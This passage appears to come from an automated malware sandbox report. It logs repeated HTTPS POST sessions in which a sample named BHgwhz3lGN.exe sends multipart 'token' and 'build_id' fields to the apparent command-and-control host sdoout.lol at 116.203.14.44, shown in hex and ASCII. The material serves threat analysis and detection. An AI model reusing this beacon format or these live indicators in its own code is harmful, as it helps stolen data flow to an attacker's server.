                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          63192.168.2.953991116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:10 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----5p8q9zmy5phvaa1no8gl
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:10 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 35 70 38 71 39 7a 6d 79 35 70 68 76 61 61 31 6e 6f 38 67 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 35 70 38 71 39 7a 6d 79 35 70 68 76 61 61 31 6e 6f 38 67 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 35 70 38 71 39 7a 6d 79 35 70 68 76 61 61 31 6e 6f 38 67 6c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------5p8q9zmy5phvaa1no8glContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------5p8q9zmy5phvaa1no8glContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------5p8q9zmy5phvaa1no8glCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:11 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          64192.168.2.953992116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:11 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----1no8gdbiwlx4eukfkxtr
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:11 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 31 6e 6f 38 67 64 62 69 77 6c 78 34 65 75 6b 66 6b 78 74 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 31 6e 6f 38 67 64 62 69 77 6c 78 34 65 75 6b 66 6b 78 74 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 31 6e 6f 38 67 64 62 69 77 6c 78 34 65 75 6b 66 6b 78 74 72 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------1no8gdbiwlx4eukfkxtrContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------1no8gdbiwlx4eukfkxtrContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------1no8gdbiwlx4eukfkxtrCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:12 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          65192.168.2.953993116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:13 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----5fctjwlnohdbaiwtrqqq
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:13 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 35 66 63 74 6a 77 6c 6e 6f 68 64 62 61 69 77 74 72 71 71 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 35 66 63 74 6a 77 6c 6e 6f 68 64 62 61 69 77 74 72 71 71 71 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 35 66 63 74 6a 77 6c 6e 6f 68 64 62 61 69 77 74 72 71 71 71 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------5fctjwlnohdbaiwtrqqqContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------5fctjwlnohdbaiwtrqqqContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------5fctjwlnohdbaiwtrqqqCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:13 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:13 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          66192.168.2.953994116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:13 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----gva1noz5pphvaasr1dbs
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:13 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 67 76 61 31 6e 6f 7a 35 70 70 68 76 61 61 73 72 31 64 62 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 67 76 61 31 6e 6f 7a 35 70 70 68 76 61 61 73 72 31 64 62 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 67 76 61 31 6e 6f 7a 35 70 70 68 76 61 61 73 72 31 64 62 73 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------gva1noz5pphvaasr1dbsContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------gva1noz5pphvaasr1dbsContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------gva1noz5pphvaasr1dbsCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:14 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          67192.168.2.953995116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:15 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----c2no8yc2d268qq90z5xl
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:15 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 63 32 6e 6f 38 79 63 32 64 32 36 38 71 71 39 30 7a 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 63 32 6e 6f 38 79 63 32 64 32 36 38 71 71 39 30 7a 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 63 32 6e 6f 38 79 63 32 64 32 36 38 71 71 39 30 7a 35 78 6c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------c2no8yc2d268qq90z5xlContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------c2no8yc2d268qq90z5xlContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------c2no8yc2d268qq90z5xlCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:15 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          68192.168.2.953996116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:16 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----dj5xtr1d2dtjeus00hd2
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:16 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 64 6a 35 78 74 72 31 64 32 64 74 6a 65 75 73 30 30 68 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 35 78 74 72 31 64 32 64 74 6a 65 75 73 30 30 68 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 35 78 74 72 31 64 32 64 74 6a 65 75 73 30 30 68 64 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------dj5xtr1d2dtjeus00hd2Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------dj5xtr1d2dtjeus00hd2Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------dj5xtr1d2dtjeus00hd2Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:16 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          69192.168.2.953997116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:17 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8qqi5xlxt00zuaaasr90
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:17 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 38 71 71 69 35 78 6c 78 74 30 30 7a 75 61 61 61 73 72 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 38 71 71 69 35 78 6c 78 74 30 30 7a 75 61 61 61 73 72 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 38 71 71 69 35 78 6c 78 74 30 30 7a 75 61 61 61 73 72 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------8qqi5xlxt00zuaaasr90Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------8qqi5xlxt00zuaaasr90Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------8qqi5xlxt00zuaaasr90Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:17 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:17 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          70192.168.2.953998116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:18 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----yuaiwtrqqimg4ekxl6fc
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:18 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 79 75 61 69 77 74 72 71 71 69 6d 67 34 65 6b 78 6c 36 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 79 75 61 69 77 74 72 71 71 69 6d 67 34 65 6b 78 6c 36 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 79 75 61 69 77 74 72 71 71 69 6d 67 34 65 6b 78 6c 36 66 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------yuaiwtrqqimg4ekxl6fcContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------yuaiwtrqqimg4ekxl6fcContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------yuaiwtrqqimg4ekxl6fcCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:18 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          71192.168.2.953999116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:19 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----tr1ng4ozmyusrqq9zua1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:19 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 74 72 31 6e 67 34 6f 7a 6d 79 75 73 72 71 71 39 7a 75 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 74 72 31 6e 67 34 6f 7a 6d 79 75 73 72 71 71 39 7a 75 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 74 72 31 6e 67 34 6f 7a 6d 79 75 73 72 71 71 39 7a 75 61 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------tr1ng4ozmyusrqq9zua1Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------tr1ng4ozmyusrqq9zua1Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------tr1ng4ozmyusrqq9zua1Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:19 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          72192.168.2.954000116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:20 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----tr1ng4ozmyusrqq9zua1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
